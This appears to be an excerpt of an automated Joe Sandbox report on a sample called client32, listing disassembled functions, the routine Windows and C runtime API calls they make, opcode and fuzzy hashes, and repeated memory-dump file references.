Associated: 00000006.00000002.3148186159.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ExtractFileIconModuleName
String ID:
API String ID: 3911389742-0
Opcode ID: 01063847e38c2fa817ea410c82c91b75b06626eb0c876785d9cfe351996907d3
Instruction ID: fbd1f7f6eca67a3d4699d4d052ae62d0c626dfd316a41b503206f924cf5b890f
Opcode Fuzzy Hash: 01063847e38c2fa817ea410c82c91b75b06626eb0c876785d9cfe351996907d3
Instruction Fuzzy Hash: EFF02478A4511C9FEB48CFE4CC86FBDF769E784708F808269EE12871C4CE7029488740

Function 11160535 Relevance: 3.0, APIs: 2, Instructions: 32COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 11165ABF: __getptd_noexit.LIBCMT ref: 11165ABF

__lock_file.LIBCMT ref: 1116057C
__fclose_nolock.LIBCMT ref: 11160587

Memory Dump Source

Source File: 00000006.00000002.3148005274.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3147988633.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148166805.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: __fclose_nolock__getptd_noexit__lock_file
String ID:
API String ID: 2959217138-0
Opcode ID: 9c94bd5ad8adf114722855a36b49f4cfe2d274427d0abc081df420240f29e7a8
Instruction ID: c99a5f40794e7bd6d5a1a4a2a70ed171e4b9561b0896b3e5cf790a4aaee0ba1f
Opcode Fuzzy Hash: 9c94bd5ad8adf114722855a36b49f4cfe2d274427d0abc081df420240f29e7a8
Instruction Fuzzy Hash: A7F09035D11B179AD710AB7598047AEFBB86F0133CF118208C4649A1D0CBFEAA21DB96

Function 68C76C1E Relevance: 3.0, APIs: 2, Instructions: 30sleepCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 68C76C26
Sleep.KERNEL32(00000064), ref: 68C76C5B

Part of subcall function 68C76940: GetTickCount.KERNEL32 ref: 68C76950

Memory Dump Source

Source File: 00000006.00000002.3148667089.0000000068C61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68C60000, based on PE: true

Associated: 00000006.00000002.3148647629.0000000068C60000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148703275.0000000068CA0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148722789.0000000068CA9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148786200.0000000068CB0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_68c60000_client32.jbxd

Yara matches

Similarity

API ID: CountTick$Sleep
String ID:
API String ID: 4250438611-0
Opcode ID: ef4360ef913306e7d88b8ea5a6df98909780520ff408667155e4aab48d75d793
Instruction ID: f6d924c70e99c0408fcd79d5027175340d7ca0170fea7d73a3b7a60d9f06d628
Opcode Fuzzy Hash: ef4360ef913306e7d88b8ea5a6df98909780520ff408667155e4aab48d75d793
Instruction Fuzzy Hash: DEF05E72600604CEDF24DF659995B2CBBB1EB5231DF51402AC62297580E774CC81C741

Function 68C663A0 Relevance: 3.0, APIs: 2, Instructions: 10sleepnetworkCOMMON

Download Yara Rule

APIs

WSACancelBlockingCall.WSOCK32 ref: 68C663A9
Sleep.KERNEL32(00000032), ref: 68C663B3

Memory Dump Source

Source File: 00000006.00000002.3148667089.0000000068C61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68C60000, based on PE: true

Associated: 00000006.00000002.3148647629.0000000068C60000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148703275.0000000068CA0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148722789.0000000068CA9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148786200.0000000068CB0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_68c60000_client32.jbxd

Yara matches

Similarity

API ID: BlockingCallCancelSleep
String ID:
API String ID: 3706969569-0
Opcode ID: dccf97365d8654f700a87d00eb5b9e081b90710de0d3d85964c696f59706f9b2
Instruction ID: 30c10159f64885a5792f237d54d18d1f6cdd880ee5b9382f36a7832175759295
Opcode Fuzzy Hash: dccf97365d8654f700a87d00eb5b9e081b90710de0d3d85964c696f59706f9b2
Instruction Fuzzy Hash: F7B092B829151289AB0017751986A3E24D80F9439FFD004713B61C9085FF20C140A161

Function 11141510 Relevance: 2.6, APIs: 2, Instructions: 58sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 11141430: ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,77077310), ref: 11141457

Part of subcall function 1116076B: __fsopen.LIBCMT ref: 11160778

GetLastError.KERNEL32(?,0241B818,000000FF,?), ref: 11141545
Sleep.KERNEL32(000000C8,?,?,?,?,?,?,0241B818,000000FF,?), ref: 11141555

Memory Dump Source

Source File: 00000006.00000002.3148005274.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3147988633.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148166805.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: EnvironmentErrorExpandLastSleepStrings__fsopen
String ID:
API String ID: 3768737497-0
Opcode ID: 81746d2f9acf91c020a5a3f6663b8b5426944b6bd56996d575389eba168b1fdf
Instruction ID: 7e8c35b226adcaf9db255fe0cc88c7d1a69018d15e21d4c5589b92f150ef4e8a
Opcode Fuzzy Hash: 81746d2f9acf91c020a5a3f6663b8b5426944b6bd56996d575389eba168b1fdf
Instruction Fuzzy Hash: 19114876F00615ABDB119F90CDC0AAEF778EF46A19F244164EC06DB200E734BE518BE2

Function 11010980 Relevance: 1.7, APIs: 1, Instructions: 151COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 11010A34

Memory Dump Source

Source File: 00000006.00000002.3148005274.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3147988633.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148166805.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: LockitLockit::_std::_
String ID:
API String ID: 3382485803-0
Opcode ID: f6d0a54566054b589c6c4caa2954ea7599f026ea747ae3b3f194ddc99e0da180
Instruction ID: a25f3913c8117ba577326b804e25134151bce6e6eea091deb2a1df2ca1a14b49
Opcode Fuzzy Hash: f6d0a54566054b589c6c4caa2954ea7599f026ea747ae3b3f194ddc99e0da180
Instruction Fuzzy Hash: 7F516D75A00645DFDB04CF98C980AADBBF6FF89318F24829DD5459B389C776E902CB90

Function 1113F670 Relevance: 1.6, APIs: 1, Instructions: 70registryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RegQueryValueExA.KERNEL32(00000000,?,?,00000000,00000000,00000000,?,77068400,?,?,111417CF,00000000,CSDVersion,00000000,00000000,?), ref: 1113F690

Memory Dump Source

Source File: 00000006.00000002.3148005274.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3147988633.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148166805.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: a232fc1abe2ed2d7d844c38d6296ee0920c29362aec6298465a62cb418f01d82
Instruction ID: 10a2649455158eed3fdc33ccecd10e2613defaba2ffe2c5b463718ad866645ae
Opcode Fuzzy Hash: a232fc1abe2ed2d7d844c38d6296ee0920c29362aec6298465a62cb418f01d82
Instruction Fuzzy Hash: 4211ECB67242475FEB11CD24D690B9EF756EFC5339F20812EE58587518D2319882CB53

Function 110F8740 Relevance: 1.6, APIs: 1, Instructions: 56COMMON

Download Yara Rule

APIs

GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),?,00000048,?,1117CF74), ref: 110F876D

Memory Dump Source

Source File: 00000006.00000002.3148005274.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3147988633.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148166805.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: InformationToken
String ID:
API String ID: 4114910276-0
Opcode ID: 3ed54ede1b3f10cca51033c0e31936367da5c7eb08a16c35f026113f9e1de554
Instruction ID: 4286fe34f75cea7b88237b7f19c57be592dd9146774f55c5736f82da2c6cd1b6
Opcode Fuzzy Hash: 3ed54ede1b3f10cca51033c0e31936367da5c7eb08a16c35f026113f9e1de554
Instruction Fuzzy Hash: 9A118A71E0022D9BDB51CBA8DC557EEB7E8AB49304F0040E9E909D7340DB70AE448B91

Function 68C8A082 Relevance: 1.6, APIs: 1, Instructions: 52memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,68C86F16,00000000,?,68C8D40B,00000001,68C86F16,00000000,00000000,00000000,?,68C86F16,00000001,00000214), ref: 68C8A0C5

Part of subcall function 68C860F9: __getptd_noexit.LIBCMT ref: 68C860F9

Memory Dump Source

Source File: 00000006.00000002.3148667089.0000000068C61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68C60000, based on PE: true

Associated: 00000006.00000002.3148647629.0000000068C60000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148703275.0000000068CA0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148722789.0000000068CA9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148786200.0000000068CB0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_68c60000_client32.jbxd

Yara matches

Similarity

API ID: AllocateHeap__getptd_noexit
String ID:
API String ID: 328603210-0
Opcode ID: f8e5accc5929af42b45353985f4acccc3882b5216536e291359ac4fa67fdaa85
Instruction ID: f282f8266283b3c6685e97349e2bcb93513067437a2ce20d839d015339912dfb
Opcode Fuzzy Hash: f8e5accc5929af42b45353985f4acccc3882b5216536e291359ac4fa67fdaa85
Instruction Fuzzy Hash: 7601F171380215DEEB148E65EC08B6B3B64ABC236CF404569EC36AB2D0FB75E4028642

Function 1116C936 Relevance: 1.6, APIs: 1, Instructions: 52memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,110B7069,00000000,?,111665A4,?,110B7069,00000000,00000000,00000000,?,11167F37,00000001,00000214,?,110B7069), ref: 1116C979

Part of subcall function 11165ABF: __getptd_noexit.LIBCMT ref: 11165ABF

Memory Dump Source

Source File: 00000006.00000002.3148005274.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3147988633.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148166805.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: AllocateHeap__getptd_noexit
String ID:
API String ID: 328603210-0
Opcode ID: 2c2584ae5d3c2f1a4e30704cb69b8cb8ac2400eb86a89467f06266894a6be336
Instruction ID: 4dc312edc878e3fc85dbd7a4fe26ae7c38801a5f560f23fe2cfbf25c3476fc95
Opcode Fuzzy Hash: 2c2584ae5d3c2f1a4e30704cb69b8cb8ac2400eb86a89467f06266894a6be336
Instruction Fuzzy Hash: 8A01D8317012669BFB168F66CD44B6BB79DAF81764F01452AE815CB2D0FBF1D820C780

Function 11163AB3 Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

__waccess_s.LIBCMT ref: 11163ABE

Memory Dump Source

Source File: 00000006.00000002.3148005274.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3147988633.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148166805.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: __waccess_s
String ID:
API String ID: 4272103461-0
Opcode ID: ef7a6628b8ba34dfa5084db135283d76d392227949a9b5e0c08c397448921cd0
Instruction ID: 5c2e7bbd61f30f1aea2da67b167f4c2082f9d237e02e17c26463379e16f3f813
Opcode Fuzzy Hash: ef7a6628b8ba34dfa5084db135283d76d392227949a9b5e0c08c397448921cd0
Instruction Fuzzy Hash: 1FC09B3745814D7F5F055DE5EC00C597F5DD6807747144115F91CC9490DE73E561D540

Function 1105E2EB Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 1105E2F1

Memory Dump Source

Source File: 00000006.00000002.3148005274.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3147988633.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148166805.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 0063fd1bad2616aadce956affa811ddadc66d32b1d751c4eeb6fdd8492f4b122
Instruction ID: 149c94328b20b7684e4bcbd68a9865b5e5b17d9681ef1ea46cbc38f3ae43540f
Opcode Fuzzy Hash: 0063fd1bad2616aadce956affa811ddadc66d32b1d751c4eeb6fdd8492f4b122
Instruction Fuzzy Hash: 39B09BFFF42115295180655D7C44857EB4CE5D11BD3048537E11CC3501F111543483F0

Function 1116076B Relevance: 1.5, APIs: 1, Instructions: 10COMMONLIBRARYCODE

Download Yara Rule

APIs

__fsopen.LIBCMT ref: 11160778

Memory Dump Source

Source File: 00000006.00000002.3148005274.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3147988633.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148166805.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: __fsopen
String ID:
API String ID: 3646066109-0
Opcode ID: 458c5a181ffae5f95d358663ef626c75276123e7ccc662156e21cb703a51c411
Instruction ID: 7f7d982cc39844611e1edaafa4e80019d2d82fc8e8e4ac42b397e22a7b0e0c70
Opcode Fuzzy Hash: 458c5a181ffae5f95d358663ef626c75276123e7ccc662156e21cb703a51c411
Instruction Fuzzy Hash: 0BC09B7644010C77DF111A83DC05E457F1D97C0674F144010FF1C1D1609573E971D685

Function 00401000 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

_NSMClient32@8.PCICL32(?,?,004010A8,00000000), ref: 0040100A

Memory Dump Source

Source File: 00000006.00000002.3138579220.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.3138542026.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3138634850.0000000000403000.00000004.00000001.01000000.0000000A.sdmpDownload File
